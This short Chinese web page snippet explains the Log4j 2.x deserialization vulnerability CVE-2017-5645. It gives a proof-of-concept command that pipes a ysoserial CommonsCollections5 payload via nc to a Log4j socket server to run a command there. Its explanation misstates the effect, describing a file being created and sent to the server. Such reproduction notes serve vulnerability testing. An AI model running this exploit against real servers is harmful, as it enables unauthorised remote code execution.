Log4j-CVE-2017-5645
时间: 2023-10-25 19:08:40 浏览: 169
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
5星 · 资源好评率100%
Log4j-CVE-2017-5645是指Apache Log4j 2.x版本中存在的安全漏洞。攻击者可以利用该漏洞执行任意代码。为了利用该漏洞,攻击者可以使用ysoserial生成payload,并发送到受影响的Log4j服务器。具体操作可以使用以下命令:
java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc 192.168.1.240 4712
这个命令将创建一个名为CVE-2017-5645_is_success的文件,并发送到IP地址为192.168.1.240,端口号为4712的Log4j服务器。
阅读全文